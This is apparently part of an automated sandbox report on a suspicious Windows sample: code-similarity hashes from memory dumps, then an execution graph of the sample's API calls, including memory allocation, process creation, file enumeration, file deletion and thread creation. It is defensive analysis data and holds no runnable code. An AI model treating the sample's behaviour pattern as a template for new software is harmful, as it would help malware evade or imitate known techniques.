                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 9u$>$W$Z$t$}$}
                                                                                                                                            • API String ID: 0-97946228
                                                                                                                                            • Opcode ID: 68cd3f66003659ddfd1cce415c9d753927b941f79e15e3499c3d673410b5b78b
                                                                                                                                            • Instruction ID: d387fe1a0e887070e8996109b04aa36d638c999fc9caa1d10cd3ca16f825f3fb
                                                                                                                                            • Opcode Fuzzy Hash: 68cd3f66003659ddfd1cce415c9d753927b941f79e15e3499c3d673410b5b78b
                                                                                                                                            • Instruction Fuzzy Hash: E011CC10D1C7CED9DB12C6BC88086AEBFB11F23264F4883C9D4B52A2D2D2795706D7A6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: F$P$T$f$r$x
                                                                                                                                            • API String ID: 0-2523166886
                                                                                                                                            • Opcode ID: 75727700a54a6fc3b54220a0d48bbb14a26b1b1d41819d55820bd74801552b0d
                                                                                                                                            • Instruction ID: f5b4eb2f807af4c72e66fa1287012feeb4f07d77b5375cc1e77c2958ec7c48fd
                                                                                                                                            • Opcode Fuzzy Hash: 75727700a54a6fc3b54220a0d48bbb14a26b1b1d41819d55820bd74801552b0d
                                                                                                                                            • Instruction Fuzzy Hash: 3351E170A10756BAE724EFA4CC44BEBB7F8EF94704F00461EA509A6190E7B5B644CBA1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $i$l$o$u
                                                                                                                                            • API String ID: 0-2051669658
                                                                                                                                            • Opcode ID: 2f4f979e7a9d744d1f965f51a7f4a71002cb7048161383066d146dbbd0c2920d
                                                                                                                                            • Instruction ID: f8b0df65508b5fce62f4dcefa7233520d360880d38133609d043f28501ef2a83
                                                                                                                                            • Opcode Fuzzy Hash: 2f4f979e7a9d744d1f965f51a7f4a71002cb7048161383066d146dbbd0c2920d
                                                                                                                                            • Instruction Fuzzy Hash: 90615EB1A10205AFDB24DFA4CC84FEFB7F8AB88704F104569E919A7240E735BA41CB60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $i$l$o$u
                                                                                                                                            • API String ID: 0-2051669658
                                                                                                                                            • Opcode ID: a2b0a2fa60ee97802a189caadd85cb0c4c78e7d7a0dedcd186b56596e400df28
                                                                                                                                            • Instruction ID: 97a440402d851d2231ad21767c1772ea22fb96605ce962cce0d9bdeca365996c
                                                                                                                                            • Opcode Fuzzy Hash: a2b0a2fa60ee97802a189caadd85cb0c4c78e7d7a0dedcd186b56596e400df28
                                                                                                                                            • Instruction Fuzzy Hash: AE413BB1A10309AFDB21DFA5CC84FEFBBF8EB88704F104559E559A7240E770AA41CB60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $e$k$o
                                                                                                                                            • API String ID: 0-3624523832
                                                                                                                                            • Opcode ID: a55068be979282d34dc83a415afb4bcd6c80d87a357ea934c1cfe71289a18ec6
                                                                                                                                            • Instruction ID: f3a0c1e1a66b8ccd28ca7810c09114e09a01d19f0400eb7ecd849d3ee24ca598
                                                                                                                                            • Opcode Fuzzy Hash: a55068be979282d34dc83a415afb4bcd6c80d87a357ea934c1cfe71289a18ec6
                                                                                                                                            • Instruction Fuzzy Hash: D5B1FCB5A00709AFDB24DFA4CC85FEFB7F9AF88704F108558F619A7240D675AA41CB60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $e$h$o
                                                                                                                                            • API String ID: 0-3662636641
                                                                                                                                            • Opcode ID: c7a519b6f85a77fafb681f7c5a40ae3fff37a7b8d62411df535c8e10e6363702
                                                                                                                                            • Instruction ID: 6476ca5a571f90850c113fccb56d89cffd8af4ad20221a840dbff264b77fd4c9
                                                                                                                                            • Opcode Fuzzy Hash: c7a519b6f85a77fafb681f7c5a40ae3fff37a7b8d62411df535c8e10e6363702
                                                                                                                                            • Instruction Fuzzy Hash: 5B8159B29102697EEB25EB94CD44FEF73BCAF48304F40869AE50966140EB747B44CFA1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $e$k$o
                                                                                                                                            • API String ID: 0-3624523832
                                                                                                                                            • Opcode ID: 364656f7f8e3204c8a290aa5219b21a4bcb19782370dcb4ed2621add598f005b
                                                                                                                                            • Instruction ID: 88943efb106a251fff31c316fdedb69e0d4fabe3e3c73b1cc8640097daee8f5b
                                                                                                                                            • Opcode Fuzzy Hash: 364656f7f8e3204c8a290aa5219b21a4bcb19782370dcb4ed2621add598f005b
                                                                                                                                            • Instruction Fuzzy Hash: 1661FAB5A00709AFDB24DFA5CC84FEFB7F9AB88704F108558E619A7244D771AA41CB60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                            • API String ID: 0-2877786613
                                                                                                                                            • Opcode ID: 77c5c0074d3053acb9403f361c11b75d78b2c28e39fc956f86384b03c66a7c79
                                                                                                                                            • Instruction ID: a6d7e8b2530daf71e25451c5db6a4496386d39043363b8717c191284fbd45f76
                                                                                                                                            • Opcode Fuzzy Hash: 77c5c0074d3053acb9403f361c11b75d78b2c28e39fc956f86384b03c66a7c79
                                                                                                                                            • Instruction Fuzzy Hash: 39416F71621569BEF701FB908D41FFF777CAF55A04F004549F600AA180E774AB0587AA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                            • API String ID: 0-2877786613
                                                                                                                                            • Opcode ID: 0e11e126845198db919dfa2b8679584f5a12564fa7d049ca3cddfbc08df67072
                                                                                                                                            • Instruction ID: a412525d38d1bd5f68612a996a644c8b871d1700ea197f110c11587169c99673
                                                                                                                                            • Opcode Fuzzy Hash: 0e11e126845198db919dfa2b8679584f5a12564fa7d049ca3cddfbc08df67072
                                                                                                                                            • Instruction Fuzzy Hash: 70315F71621569BEF701FB908D41FFF777CAF55604F004548FA04AA180E774BB0587AA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 1$3$9$Y
                                                                                                                                            • API String ID: 0-242293358
                                                                                                                                            • Opcode ID: 6e4d105d2c0138823abf775b7f13f890c50d1d686ce499a1aae2527a36c4b635
                                                                                                                                            • Instruction ID: 4754a6e04d5bb22162152197bf4a9968294d1388e93b5d95830563add99ca988
                                                                                                                                            • Opcode Fuzzy Hash: 6e4d105d2c0138823abf775b7f13f890c50d1d686ce499a1aae2527a36c4b635
                                                                                                                                            • Instruction Fuzzy Hash: 583134B1A10119BBFB04EF94DD41BFFB7F8EF44304F008159E904A6240EB75AA458BE5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $e$k$o
                                                                                                                                            • API String ID: 0-3624523832
                                                                                                                                            • Opcode ID: c66270da216cd17fc1db351ecbec12422130c897862b228a087fe367d305e036
                                                                                                                                            • Instruction ID: d20852f301465940d00f2b70045a1adcbe459493af65ef3d719e84630b807d55
                                                                                                                                            • Opcode Fuzzy Hash: c66270da216cd17fc1db351ecbec12422130c897862b228a087fe367d305e036
                                                                                                                                            • Instruction Fuzzy Hash: 610184B2900218ABDB14EF98D884ADEF7B9FF48314F048219E919AB205E771E545CBA0

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:2.6%
                                                                                                                                            Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                                            Signature Coverage:2.2%
                                                                                                                                            Total number of Nodes:465
                                                                                                                                            Total number of Limit Nodes:75
                                                                                                                                            execution_graph 98503 2f576f0 98504 2f57762 98503->98504 98505 2f57708 98503->98505 98505->98504 98507 2f5b660 98505->98507 98508 2f5b686 98507->98508 98509 2f5b8b9 98508->98509 98534 2f69d00 98508->98534 98509->98504 98511 2f5b6fc 98511->98509 98537 2f6cba0 98511->98537 98513 2f5b71b 98513->98509 98514 2f5b7f2 98513->98514 98543 2f68f40 98513->98543 98516 2f55f10 LdrInitializeThunk 98514->98516 98518 2f5b811 98514->98518 98516->98518 98533 2f5b8a1 98518->98533 98555 2f68ab0 98518->98555 98520 2f5b786 98520->98509 98527 2f5b7da 98520->98527 98529 2f5b7b8 98520->98529 98547 2f55f10 98520->98547 98524 2f584e0 LdrInitializeThunk 98528 2f5b8af 98524->98528 98526 2f5b878 98560 2f68b60 98526->98560 98551 2f584e0 98527->98551 98528->98504 98570 2f64bc0 LdrInitializeThunk 98529->98570 98531 2f5b892 98565 2f68cc0 98531->98565 98533->98524 98535 2f69d1a 98534->98535 98536 2f69d2b CreateProcessInternalW 98535->98536 98536->98511 98538 2f6cb10 98537->98538 98540 2f6cb6d 98538->98540 98571 2f6bab0 98538->98571 98540->98513 98541 2f6cb4a 98574 2f6b9d0 98541->98574 98544 2f68f5d 98543->98544 98583 3a32c0a 98544->98583 98545 2f5b77d 98545->98514 98545->98520 98548 2f55f16 98547->98548 98586 2f69110 98548->98586 98550 2f55f4e 98550->98529 98552 2f584f3 98551->98552 98592 2f68e40 98552->98592 98554 2f5851e 98554->98504 98556 2f68b30 98555->98556 98558 2f68ade 98555->98558 98598 3a339b0 LdrInitializeThunk 98556->98598 98557 2f68b55 98557->98526 98558->98526 98561 2f68b8e 98560->98561 98562 2f68be0 98560->98562 98561->98531 98599 3a34340 LdrInitializeThunk 98562->98599 98563 2f68c05 98563->98531 98566 2f68d3d 98565->98566 98568 2f68ceb 98565->98568 98600 3a32fb0 LdrInitializeThunk 98566->98600 98567 2f68d62 98567->98533 98568->98533 98570->98527 98577 2f69c20 98571->98577 98573 2f6bacb 98573->98541 98580 2f69c70 98574->98580 98576 2f6b9e9 98576->98540 98578 2f69c3a 98577->98578 98579 2f69c4b RtlAllocateHeap 98578->98579 98579->98573 98581 2f69c8a 98580->98581 98582 2f69c9b RtlFreeHeap 98581->98582 98582->98576 98584 3a32c11 98583->98584 98585 3a32c1f LdrInitializeThunk 98583->98585 98584->98545 98585->98545 98587 2f691c4 98586->98587 98589 2f69142 98586->98589 98591 3a32d10 LdrInitializeThunk 98587->98591 98588 2f69209 98588->98550 98589->98550 98591->98588 98593 2f68ebe 98592->98593 98594 2f68e6b 98592->98594 98597 3a32dd0 LdrInitializeThunk 98593->98597 98594->98554 98595 2f68ee3 98595->98554 98597->98595 98598->98557 98599->98563 98600->98567 98601 2f5ffb0 98604 2f678e0 98601->98604 98603 2f5ffcf 98605 2f67945 98604->98605 98606 2f67974 98605->98606 98609 2f5dd50 98605->98609 98606->98603 98608 2f67956 98608->98603 98610 2f5dd4e 98609->98610 98611 2f5dcc0 98609->98611 98610->98608 98612 2f5dd3c 98611->98612 98614 2f65290 98611->98614 98612->98608 98615 2f652f5 98614->98615 98616 2f6532c 98615->98616 98619 2f587a0 98615->98619 98616->98611 98618 2f6530e 98618->98611 98620 2f58793 98619->98620 98620->98619 98621 2f58740 98620->98621 98623 2f57490 98620->98623 98621->98618 98624 2f574a6 98623->98624 98626 2f574df 98623->98626 98624->98626 98627 2f57300 LdrLoadDll 98624->98627 98626->98620 98627->98626 98628 2f51170 98629 2f51173 98628->98629 98634 2f54920 98629->98634 98631 2f511a8 98632 2f511ed 98631->98632 98633 2f511e1 PostThreadMessageW 98631->98633 98633->98632 98635 2f54944 98634->98635 98636 2f5494b 98635->98636 98637 2f54980 LdrLoadDll 98635->98637 98636->98631 98637->98636 98638 2f57170 98639 2f5719a 98638->98639 98642 2f58310 98639->98642 98641 2f571c4 98643 2f5832d 98642->98643 98649 2f69030 98643->98649 98645 2f5837d 98646 2f58384 98645->98646 98647 2f69110 LdrInitializeThunk 98645->98647 98646->98641 98648 2f583ad 98647->98648 98648->98641 98650 2f690cb 98649->98650 98652 2f6905b 98649->98652 98654 3a32f30 LdrInitializeThunk 98650->98654 98651 2f69104 98651->98645 98652->98645 98654->98651 98655 2f68ef0 98656 2f68f0d 98655->98656 98659 3a32df0 LdrInitializeThunk 98656->98659 98657 2f68f35 98659->98657 98660 2f534b3 98665 2f58160 98660->98665 98663 2f534df 98666 2f534c3 98665->98666 98667 2f5817a 98665->98667 98666->98663 98671 2f698f0 98666->98671 98674 2f68fe0 98667->98674 98670 2f698f0 NtClose 98670->98666 98672 2f6990d 98671->98672 98673 2f6991e NtClose 98672->98673 98673->98663 98675 2f68ffa 98674->98675 98678 3a335c0 LdrInitializeThunk 98675->98678 98676 2f5824a 98676->98670 98678->98676 98679 2f664b0 98680 2f6650a 98679->98680 98682 2f66517 98680->98682 98683 2f63eb0 98680->98683 98690 2f6b940 98683->98690 98685 2f63ffe 98685->98682 98686 2f63ef1 98686->98685 98687 2f54920 LdrLoadDll 98686->98687 98689 2f63f37 98687->98689 98688 2f63f80 Sleep 98688->98689 98689->98685 98689->98688 98693 2f69a60 98690->98693 98692 2f6b971 98692->98686 98694 2f69a8b 98693->98694 98695 2f69af5 98693->98695 98694->98692 98696 2f69b0b NtAllocateVirtualMemory 98695->98696 98696->98692 98697 2f695f0 98698 2f696a7 98697->98698 98700 2f6961f 98697->98700 98699 2f696bd NtCreateFile 98698->98699 98701 2f59ff3 98702 2f59fff 98701->98702 98703 2f5a006 98702->98703 98704 2f6b9d0 RtlFreeHeap 98702->98704 98704->98703 98705 2f68d70 98706 2f68e02 98705->98706 98707 2f68d9e 98705->98707 98710 3a32ee0 LdrInitializeThunk 98706->98710 98708 2f68e33 98710->98708 98712 2f49de0 98713 2f49def 98712->98713 98714 2f49e30 98713->98714 98715 2f49e1d CreateThread 98713->98715 98716 2f5c9e0 98717 2f5ca09 98716->98717 98718 2f5cb0d 98717->98718 98719 2f5cab3 FindFirstFileW 98717->98719 98719->98718 98722 2f5cace 98719->98722 98720 2f5caf4 FindNextFileW 98721 2f5cb06 FindClose 98720->98721 98720->98722 98721->98718 98722->98720 98723 2f5b120 98728 2f5ae30 98723->98728 98725 2f5b12d 98744 2f5aab0 98725->98744 98727 2f5b149 98729 2f5ae55 98728->98729 98756 2f58750 98729->98756 98732 2f5afa3 98732->98725 98734 2f5afba 98734->98725 98735 2f65290 LdrLoadDll 98736 2f5afb1 98735->98736 98736->98734 98736->98735 98739 2f5b0a7 98736->98739 98775 2f5a500 98736->98775 98738 2f65290 LdrLoadDll 98738->98739 98739->98738 98740 2f5b10a 98739->98740 98784 2f5a870 98739->98784 98742 2f6b9d0 RtlFreeHeap 98740->98742 98743 2f5b111 98742->98743 98743->98725 98745 2f5aac6 98744->98745 98753 2f5aad1 98744->98753 98746 2f6bab0 RtlAllocateHeap 98745->98746 98746->98753 98747 2f5aaf2 98747->98727 98748 2f58750 GetFileAttributesW 98748->98753 98749 2f5ae02 98750 2f5ae1b 98749->98750 98751 2f6b9d0 RtlFreeHeap 98749->98751 98750->98727 98751->98750 98752 2f65290 LdrLoadDll 98752->98753 98753->98747 98753->98748 98753->98749 98753->98752 98754 2f5a500 RtlFreeHeap 98753->98754 98755 2f5a870 RtlFreeHeap 98753->98755 98754->98753 98755->98753 98757 2f58771 98756->98757 98758 2f58783 98757->98758 98759 2f58778 GetFileAttributesW 98757->98759 98758->98732 98760 2f63770 98758->98760 98759->98758 98761 2f6377e 98760->98761 98762 2f63785 98760->98762 98761->98736 98763 2f54920 LdrLoadDll 98762->98763 98764 2f637ba 98763->98764 98765 2f637c9 98764->98765 98788 2f63230 LdrLoadDll 98764->98788 98767 2f6bab0 RtlAllocateHeap 98765->98767 98771 2f63977 98765->98771 98768 2f637e2 98767->98768 98769 2f6396d 98768->98769 98768->98771 98772 2f637fe 98768->98772 98770 2f6b9d0 RtlFreeHeap 98769->98770 98769->98771 98770->98771 98771->98736 98772->98771 98773 2f6b9d0 RtlFreeHeap 98772->98773 98774 2f63961 98773->98774 98774->98736 98776 2f5a526 98775->98776 98789 2f5df50 98776->98789 98778 2f5a598 98780 2f5a720 98778->98780 98782 2f5a5b6 98778->98782 98779 2f5a705 98779->98736 98780->98779 98781 2f5a3c0 RtlFreeHeap 98780->98781 98781->98780 98782->98779 98794 2f5a3c0 98782->98794 98785 2f5a896 98784->98785 98786 2f5df50 RtlFreeHeap 98785->98786 98787 2f5a91d 98786->98787 98787->98739 98788->98765 98791 2f5df74 98789->98791 98790 2f5df81 98790->98778 98791->98790 98792 2f6b9d0 RtlFreeHeap 98791->98792 98793 2f5dfc4 98792->98793 98793->98778 98795 2f5a3dd 98794->98795 98798 2f5dfe0 98795->98798 98797 2f5a4e3 98797->98782 98799 2f5e004 98798->98799 98800 2f5e0ae 98799->98800 98801 2f6b9d0 RtlFreeHeap 98799->98801 98800->98797 98801->98800 98802 2f61f20 98805 2f61f39 98802->98805 98803 2f61f81 98804 2f6b9d0 RtlFreeHeap 98803->98804 98806 2f61f91 98804->98806 98805->98803 98807 2f61fc1 98805->98807 98809 2f61fc6 98805->98809 98808 2f6b9d0 RtlFreeHeap 98807->98808 98808->98809 98810 2f61721 98811 2f61731 98810->98811 98823 2f69760 98811->98823 98813 2f61742 98814 2f61775 98813->98814 98815 2f61760 98813->98815 98817 2f698f0 NtClose 98814->98817 98816 2f698f0 NtClose 98815->98816 98818 2f61769 98816->98818 98820 2f6177e 98817->98820 98819 2f617b5 98820->98819 98821 2f6b9d0 RtlFreeHeap 98820->98821 98822 2f617a9 98821->98822 98824 2f69807 98823->98824 98826 2f6978b 98823->98826 98825 2f6981d NtReadFile 98824->98825 98825->98813 98826->98813 98827 2f52650 98828 2f68f40 LdrInitializeThunk 98827->98828 98829 2f52686 98828->98829 98832 2f69990 98829->98832 98831 2f5269b 98833 2f69a1f 98832->98833 98834 2f699bb 98832->98834 98837 3a32e80 LdrInitializeThunk 98833->98837 98834->98831 98835 2f69a50 98835->98831 98837->98835 98838 2f55f90 98839 2f584e0 LdrInitializeThunk 98838->98839 98840 2f55fc0 98839->98840 98842 2f55fec 98840->98842 98843 2f58460 98840->98843 98844 2f584a4 98843->98844 98849 2f584c5 98844->98849 98850 2f68c10 98844->98850 98846 2f584d1 98846->98840 98847 2f584b5 98847->98846 98848 2f698f0 NtClose 98847->98848 98848->98849 98849->98840 98851 2f68c90 98850->98851 98853 2f68c3e 98850->98853 98855 3a34650 LdrInitializeThunk 98851->98855 98852 2f68cb5 98852->98847 98853->98847 98855->98852 98856 2f57510 98857 2f5752c 98856->98857 98865 2f5757f 98856->98865 98859 2f698f0 NtClose 98857->98859 98857->98865 98858 2f576b7 98860 2f57547 98859->98860 98866 2f56930 NtClose LdrInitializeThunk LdrInitializeThunk 98860->98866 98862 2f57691 98862->98858 98868 2f56b00 NtClose LdrInitializeThunk LdrInitializeThunk 98862->98868 98865->98858 98867 2f56930 NtClose LdrInitializeThunk LdrInitializeThunk 98865->98867 98866->98865 98867->98862 98868->98858 98869 2f6cad0 98870 2f6b9d0 RtlFreeHeap 98869->98870 98871 2f6cae5 98870->98871 98872 2f69850 98873 2f698c7 98872->98873 98875 2f6987b 98872->98875 98874 2f698dd NtDeleteFile 98873->98874 98886 2f61b90 98887 2f61bac 98886->98887 98888 2f61bd4 98887->98888 98889 2f61be8 98887->98889 98890 2f698f0 NtClose 98888->98890 98891 2f698f0 NtClose 98889->98891 98892 2f61bdd 98890->98892 98893 2f61bf1 98891->98893 98896 2f6baf0 RtlAllocateHeap 98893->98896 98895 2f61bfc 98896->98895 98897 2f52b1a 98898 2f52b48 98897->98898 98901 2f566a0 98898->98901 98900 2f52b53 98902 2f566d3 98901->98902 98903 2f566f7 98902->98903 98908 2f69460 98902->98908 98903->98900 98905 2f5671a 98905->98903 98906 2f698f0 NtClose 98905->98906 98907 2f5679a 98906->98907 98907->98900 98909 2f6947a 98908->98909 98912 3a32ca0 LdrInitializeThunk 98909->98912 98910 2f694a6 98910->98905 98912->98910 98913 3a32ad0 LdrInitializeThunk 98914 2f4b8c0 98915 2f6b940 NtAllocateVirtualMemory 98914->98915 98916 2f4cf31 98915->98916 98917 2f49e40 98918 2f49e96 98917->98918 98920 2f4a68a 98918->98920 98921 2f6b630 98918->98921 98922 2f6b656 98921->98922 98927 2f44090 98922->98927 98924 2f6b662 98926 2f6b69b 98924->98926 98930 2f65a40 98924->98930 98926->98920 98934 2f535c0 98927->98934 98929 2f4409d 98929->98924 98931 2f65aa2 98930->98931 98933 2f65aaf 98931->98933 98945 2f51d90 98931->98945 98933->98926 98935 2f535dd 98934->98935 98937 2f535f6 98935->98937 98938 2f6a370 98935->98938 98937->98929 98940 2f6a38a 98938->98940 98939 2f6a3b9 98939->98937 98940->98939 98941 2f68f40 LdrInitializeThunk 98940->98941 98942 2f6a419 98941->98942 98943 2f6b9d0 RtlFreeHeap 98942->98943 98944 2f6a432 98943->98944 98944->98937 98946 2f51dcb 98945->98946 98961 2f58270 98946->98961 98948 2f51dd3 98949 2f6bab0 RtlAllocateHeap 98948->98949 98960 2f520b0 98948->98960 98950 2f51de9 98949->98950 98951 2f6bab0 RtlAllocateHeap 98950->98951 98952 2f51dfa 98951->98952 98953 2f6bab0 RtlAllocateHeap 98952->98953 98954 2f51e0b 98953->98954 98956 2f51ea2 98954->98956 98976 2f56e00 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98954->98976 98957 2f54920 LdrLoadDll 98956->98957 98958 2f52062 98957->98958 98972 2f68380 98958->98972 98960->98933 98962 2f5829c 98961->98962 98963 2f58160 2 API calls 98962->98963 98964 2f582bf 98963->98964 98965 2f582e1 98964->98965 98966 2f582c9 98964->98966 98967 2f582fd 98965->98967 98970 2f698f0 NtClose 98965->98970 98968 2f698f0 NtClose 98966->98968 98969 2f582d4 98966->98969 98967->98948 98968->98969 98969->98948 98971 2f582f3 98970->98971 98971->98948 98973 2f683e2 98972->98973 98975 2f683ef 98973->98975 98977 2f520c0 98973->98977 98975->98960 98976->98956 98993 2f58540 98977->98993 98979 2f520e0 98986 2f52632 98979->98986 98997 2f61560 98979->98997 98981 2f5213e 98981->98986 99000 2f6ca70 98981->99000 98983 2f522f7 98984 2f6cba0 2 API calls 98983->98984 98987 2f5230c 98984->98987 98985 2f584e0 LdrInitializeThunk 98989 2f52359 98985->98989 98986->98975 98987->98989 99005 2f50c00 98987->99005 98989->98985 98989->98986 98991 2f50c00 LdrInitializeThunk 98989->98991 98990 2f584e0 LdrInitializeThunk 98992 2f524b0 98990->98992 98991->98989 98992->98989 98992->98990 98994 2f5854d 98993->98994 98995 2f58575 98994->98995 98996 2f5856e SetErrorMode 98994->98996 98995->98979 98996->98995 98998 2f6b940 NtAllocateVirtualMemory 98997->98998 98999 2f61581 98998->98999 98999->98981 99001 2f6ca86 99000->99001 99002 2f6ca80 99000->99002 99003 2f6bab0 RtlAllocateHeap 99001->99003 99002->98983 99004 2f6caac 99003->99004 99004->98983 99006 2f50c1c 99005->99006 99009 2f69b80 99006->99009 99010 2f69b9d 99009->99010 99013 3a32c70 LdrInitializeThunk 99010->99013 99011 2f50c22 99011->98992 99013->99011 99014 2f5fc40 99015 2f5fca4 99014->99015 99016 2f566a0 2 API calls 99015->99016 99018 2f5fdd7 99016->99018 99017 2f5fdde 99018->99017 99043 2f567b0 99018->99043 99020 2f5ff83 99021 2f5ff92 99023 2f698f0 NtClose 99021->99023 99022 2f5fe5a 99022->99020 99022->99021 99047 2f5fa20 99022->99047 99025 2f5ff9c 99023->99025 99026 2f5fe96 99026->99021 99027 2f5fea1 99026->99027 99028 2f6bab0 RtlAllocateHeap 99027->99028 99029 2f5feca 99028->99029 99030 2f5fed3 99029->99030 99031 2f5fee9 99029->99031 99032 2f698f0 NtClose 99030->99032 99056 2f5f910 CoInitialize 99031->99056 99035 2f5fedd 99032->99035 99034 2f5fef7 99059 2f693b0 99034->99059 99037 2f5ff72 99038 2f698f0 NtClose 99037->99038 99039 2f5ff7c 99038->99039 99040 2f6b9d0 RtlFreeHeap 99039->99040 99040->99020 99041 2f5ff15 99041->99037 99042 2f693b0 LdrInitializeThunk 99041->99042 99042->99041 99044 2f567d5 99043->99044 99063 2f69260 99044->99063 99048 2f5fa3c 99047->99048 99049 2f54920 LdrLoadDll 99048->99049 99051 2f5fa5a 99049->99051 99050 2f5fa63 99050->99026 99051->99050 99052 2f54920 LdrLoadDll 99051->99052 99053 2f5fb2e 99052->99053 99054 2f54920 LdrLoadDll 99053->99054 99055 2f5fb8b 99053->99055 99054->99055 99055->99026 99058 2f5f975 99056->99058 99057 2f5fa0b CoUninitialize 99057->99034 99058->99057 99060 2f693cd 99059->99060 99068 3a32ba0 LdrInitializeThunk 99060->99068 99061 2f693fd 99061->99041 99064 2f6927d 99063->99064 99067 3a32c60 LdrInitializeThunk 99064->99067 99065 2f56849 99065->99022 99067->99065 99068->99061 99069 2f60540 99070 2f60563 99069->99070 99071 2f54920 LdrLoadDll 99070->99071 99072 2f60587 99071->99072

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
